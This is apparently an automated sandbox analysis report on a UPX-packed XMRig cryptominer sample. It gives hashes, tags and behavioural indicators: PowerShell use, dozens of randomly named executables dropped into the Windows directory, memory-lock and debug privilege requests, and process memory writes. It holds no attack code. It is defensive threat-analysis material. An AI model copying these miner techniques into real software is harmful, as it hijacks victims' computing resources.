Malware Analysis Report

2024-09-10 08:04

Sample ID 240613-p6n6mstenm
Target 7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe
SHA256 e062efc7fc716c231e974cd3d8730e37f3f9fdc4263d05dc8f4a274521ba1463
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e062efc7fc716c231e974cd3d8730e37f3f9fdc4263d05dc8f4a274521ba1463

Threat Level: Known bad

The file 7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

xmrig

XMRig Miner payload

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 12:56

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 12:56

Reported

2024-06-13 12:59

Platform

win7-20240611-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Windows\System32\sj0mxx.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\VbFWwuv.exe N/A
N/A N/A C:\Windows\System\gKYaTiu.exe N/A
N/A N/A C:\Windows\System\YevrTTm.exe N/A
N/A N/A C:\Windows\System\MKdGMMI.exe N/A
N/A N/A C:\Windows\System\zXtHaPz.exe N/A
N/A N/A C:\Windows\System\aaWsMRc.exe N/A
N/A N/A C:\Windows\System\WaRAAUT.exe N/A
N/A N/A C:\Windows\System\utCiJhi.exe N/A
N/A N/A C:\Windows\System\EVqHuxE.exe N/A
N/A N/A C:\Windows\System\KTtPfRU.exe N/A
N/A N/A C:\Windows\System\jzneUsQ.exe N/A
N/A N/A C:\Windows\System\kAaBjcz.exe N/A
N/A N/A C:\Windows\System\GaUEMYy.exe N/A
N/A N/A C:\Windows\System\ASxtKPG.exe N/A
N/A N/A C:\Windows\System\uedThTv.exe N/A
N/A N/A C:\Windows\System\LlaYsrg.exe N/A
N/A N/A C:\Windows\System\HrvPhpR.exe N/A
N/A N/A C:\Windows\System\TmVgfRA.exe N/A
N/A N/A C:\Windows\System\rnSFVQL.exe N/A
N/A N/A C:\Windows\System\bqWZLju.exe N/A
N/A N/A C:\Windows\System\KEpLhzD.exe N/A
N/A N/A C:\Windows\System\PfiutKR.exe N/A
N/A N/A C:\Windows\System\ASSBonA.exe N/A
N/A N/A C:\Windows\System\SgLbZWG.exe N/A
N/A N/A C:\Windows\System\qItLdOC.exe N/A
N/A N/A C:\Windows\System\wEGNKMO.exe N/A
N/A N/A C:\Windows\System\IVZhjLr.exe N/A
N/A N/A C:\Windows\System\BfKVuUN.exe N/A
N/A N/A C:\Windows\System\fvzbwVd.exe N/A
N/A N/A C:\Windows\System\nCszyir.exe N/A
N/A N/A C:\Windows\System\zXipwxX.exe N/A
N/A N/A C:\Windows\System\QdvHMSJ.exe N/A
N/A N/A C:\Windows\System\WEbdvjp.exe N/A
N/A N/A C:\Windows\System\hhVrNrT.exe N/A
N/A N/A C:\Windows\System\ArVcZPU.exe N/A
N/A N/A C:\Windows\System\fyZvrfP.exe N/A
N/A N/A C:\Windows\System\LQAzWjt.exe N/A
N/A N/A C:\Windows\System\EsKLCeE.exe N/A
N/A N/A C:\Windows\System\gIbfqOh.exe N/A
N/A N/A C:\Windows\System\FdcmxtP.exe N/A
N/A N/A C:\Windows\System\mUuixjr.exe N/A
N/A N/A C:\Windows\System\mDDpkAG.exe N/A
N/A N/A C:\Windows\System\UWhLGPG.exe N/A
N/A N/A C:\Windows\System\xCXixqB.exe N/A
N/A N/A C:\Windows\System\RMTAcZi.exe N/A
N/A N/A C:\Windows\System\zDmFTOj.exe N/A
N/A N/A C:\Windows\System\BgnXxIA.exe N/A
N/A N/A C:\Windows\System\zdqldAj.exe N/A
N/A N/A C:\Windows\System\gzBUXEc.exe N/A
N/A N/A C:\Windows\System\UmzPkBD.exe N/A
N/A N/A C:\Windows\System\IqaMLID.exe N/A
N/A N/A C:\Windows\System\bcKayvC.exe N/A
N/A N/A C:\Windows\System\VOFKMsm.exe N/A
N/A N/A C:\Windows\System\RPROCMj.exe N/A
N/A N/A C:\Windows\System\gpcbPVb.exe N/A
N/A N/A C:\Windows\System\sPDcOqI.exe N/A
N/A N/A C:\Windows\System\tkidgaN.exe N/A
N/A N/A C:\Windows\System\DizUmCB.exe N/A
N/A N/A C:\Windows\System\aikhRbx.exe N/A
N/A N/A C:\Windows\System\NssZrzK.exe N/A
N/A N/A C:\Windows\System\dafBKxA.exe N/A
N/A N/A C:\Windows\System\Doerjdq.exe N/A
N/A N/A C:\Windows\System\KoTrUrY.exe N/A
N/A N/A C:\Windows\System\THfvkIl.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\YlaMqsF.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IaiTBib.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MxELxxC.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GFCbXbu.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SgoNJHU.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ARLcsMO.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KaSrYDK.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QtUTUaP.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CKaNJmg.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bBClWnJ.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uItZveb.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RMTAcZi.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VOFKMsm.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MjufcDW.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LCLdbLE.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JKsObGQ.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pgycgxm.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aNuxWLo.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gIbfqOh.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EwqGRpb.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FPrlVvD.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LmCJSrE.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WlEiFbg.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zDmFTOj.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RxahTLW.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fyVOtQB.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IvRONOV.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SQlXFIa.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QqxQaSS.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lWHCAql.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EyXYNKt.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\liqCXTH.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IYaEnwB.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NiUsNjV.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aJJAZbo.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VbFWwuv.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FroUTLV.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nAwFqPf.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zGDCXFJ.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JHptpOE.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dSNCenJ.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gKYaTiu.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tkidgaN.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fVPfXfn.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kXwgvdN.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JZFfbTb.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hgAVshG.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UHEenTm.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QJFCNzb.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qlrLRli.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tTvtYOO.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HPITRmr.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\spLsclJ.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SYMYosp.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WVcGJeT.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ktLDeMS.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NvzrtsQ.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\scPztDT.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jBalmHB.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ifZAvdz.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ykbXgln.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qEcxJlS.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rzTQiYh.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vHfBSNi.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2580 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\VbFWwuv.exe
